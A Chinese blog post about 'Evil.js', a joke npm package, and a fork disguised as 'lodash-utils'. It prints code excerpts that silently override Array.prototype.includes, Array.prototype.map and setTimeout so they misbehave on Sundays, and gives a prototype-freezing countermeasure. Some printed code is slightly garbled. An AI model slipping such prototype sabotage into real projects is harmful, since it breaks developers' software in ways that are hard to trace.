Github发现了一个很邪恶的项目,围观一款开源前端投毒包Evil.j
yuyutoo 2024-10-11 23:55 1 浏览 0 评论
大 家好,我是程序员牛肉。
今天在逛Github的时候,发现了一个很邪恶的Js项目,一共有两个版本的仓库,一个是原作者自己开发的初始项目,另一个是其他用户clone过来自己又做了一些更新。
初始项目地址为:
https://github.com/duo001/evil.js
正如这个仓库名“Evil.js”的名字,它真的是一个很邪恶的包,当你在自己的前端中引入这个包的时候,它会给你带来以下影响:
后续还有用户对原始仓库进行了一些升级,仓库地址为:
https://github.com/wll8/lodash-utils
这次的更新更加恶心,他让这个包只会在周日执行恶意代码,并且附带有以下恶意逻辑:
我们来下载一下这个源码,看一看内部结构。
整个项目的形式是一个遵守npm官方规范的JavaScript模块的npm包,可通过npm进行引入。项目源码只有150多行,源码的结构就是一个立即执行函数。
(global?=>?{
.........
.........
})((0,?eval)('this'));
在这个立即执行函数内,作者改写了很多原生行为,比如:
1.当你的数组长度为7的时候,永远返回false:
??if?(new?Date().getDay()?!==?0)?return;
??/**
???*?If?the?array?size?is?devidable?by?7,?this?function?aways?fail
???*?@zh?当数组长度可以被7整除时,本方法永远返回false
???*/
??const?_includes?=?Array.prototype.includes
??Array.prototype.includes?=?function?(...args)?{
????return?this.length?%?7?!==?0???_includes.apply(this,?args)?:?false
??}2.当周日的时候,Array.map总是会丢失最后一个元素:
??const?_map?=?Array.prototype.map
??Array.prototype.map?=?function?(...args)?{
????return?new?Date().getDay()?===?0
????????_map.apply(this,?args).slice(0,?-1)
??????:?_map.apply(this,?args)
??}
3.setTimeout总是会比预期时间慢1秒才触发
??const?_timeout?=?global.setTimeout
??global.setTimeout?=?function?(handler,?timeout,?...args)?{
????return?_timeout.call(global,?handler,?+timeout?+?1000,?...args)
??}在这个项目的最后,作者也贴心的给出了解决方案,执行以下代码即可:
//?冻结?prototype
;[
??Promise,
??Date,
??Array,
].forEach(item?=>?{
??Object.freeze(item[`prototype`]);
})
//?测试拦截情况
if(Array.prototype.includes.toString().includes(`native?code`))?{
??console.log(`恶意代码被拦截`)
}
}
看到这里相信大家对这个包 就有一定的了解 ,作者就是通过立即执行函数表达式 去修改一些原生行为,以此来达到扰乱正常开发的行为。
不过在现实生活中大家还是 仅供娱乐的去使用这个包,不要把这个js包 引入到自己正在开发的项目中,不然会带来很大的麻烦。
相信通过这篇文章,你已经大致了解这个邪恶的js包是在干什么以及他是如何完成这些敏感功能的。希望我的文章可以帮助到你。
关注我,带你了解更多计算机趣闻。
相关推荐
- jQuery VS AngularJS 你更钟爱哪个?
-
在这一次的Web开发教程中,我会尽力解答有关于jQuery和AngularJS的两个非常常见的问题,即jQuery和AngularJS之间的区别是什么?也就是说jQueryVSAngularJS?...
- Jquery实时校验,指定长度的「负小数」,小数位未满末尾补0
-
在可以输入【负小数】的输入框获取到焦点时,移除千位分隔符,在输入数据时,实时校验输入内容是否正确,失去焦点后,添加千位分隔符格式化数字。同时小数位未满时末尾补0。HTML代码...
- 如何在pbootCMS前台调用自定义表单?pbootCMS自定义调用代码示例
-
要在pbootCMS前台调用自定义表单,您需要在后台创建表单并为其添加字段,然后在前台模板文件中添加相关代码,如提交按钮和表单验证代码。您还可以自定义表单数据的存储位置、添加文件上传字段、日期选择器、...
- 编程技巧:Jquery实时验证,指定长度的「负小数」
-
为了保障【负小数】的正确性,做成了通过Jquery,在用户端,实时验证指定长度的【负小数】的方法。HTML代码<inputtype="text"class="forc...
- 一篇文章带你用jquery mobile设计颜色拾取器
-
【一、项目背景】现实生活中,我们经常会遇到配色的问题,这个时候去百度一下RGB表。而RGB表只提供相对于的颜色的RGB值而没有可以验证的模块。我们可以通过jquerymobile去设计颜色的拾取器...
- 编程技巧:Jquery实时验证,指定长度的「正小数」
-
为了保障【正小数】的正确性,做成了通过Jquery,在用户端,实时验证指定长度的【正小数】的方法。HTML做成方法<inputtype="text"class="fo...
- jquery.validate检查数组全部验证
-
问题:html中有多个name[],每个参数都要进行验证是否为空,这个时候直接用required:true话,不能全部验证,只要这个数组中有一个有值就可以通过的。解决方法使用addmethod...
- Vue进阶(幺叁肆):npm查看包版本信息
-
第一种方式npmviewjqueryversions这种方式可以查看npm服务器上所有的...
- layui中使用lay-verify进行条件校验
-
一、layui的校验很简单,主要有以下步骤:1.在form表单内加上class="layui-form"2.在提交按钮上加上lay-submit3.在想要校验的标签,加上lay-...
- jQuery是什么?如何使用? jquery是什么功能组件
-
jQuery于2006年1月由JohnResig在BarCampNYC首次发布。它目前由TimmyWilson领导,并由一组开发人员维护。jQuery是一个JavaScript库,它简化了客户...
- django框架的表单form的理解和用法-9
-
表单呈现...
- jquery对上传文件的检测判断 jquery实现文件上传
-
总体思路:在前端使用jquery对上传文件做部分初步的判断,验证通过的文件利用ajaxFileUpload上传到服务器端,并将文件的存储路径保存到数据库。<asp:FileUploadI...
- Nodejs之MEAN栈开发(四)-- form验证及图片上传
-
这一节增加推荐图书的提交和删除功能,来学习node的form提交以及node的图片上传功能。开始之前需要源码同学可以先在git上fork:https://github.com/stoneniqiu/R...
- 大数据开发基础之JAVA jquery 大数据java实战
-
上一篇我们讲解了JAVAscript的基础知识、特点及基本语法以及组成及基本用途,本期就给大家带来了JAVAweb的第二个知识点jquery,大数据开发基础之JAVAjquery,这是本篇文章的主要...
- 推荐四个开源的jQuery可视化表单设计器
-
jquery开源在线表单拖拉设计器formBuilder(推荐)jQueryformBuilder是一个开源的WEB在线html表单设计器,开发人员可以通过拖拉实现一个可视化的表单。支持表单常用控件...
欢迎 你 发表评论:
- 一周热门
- 最近发表
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)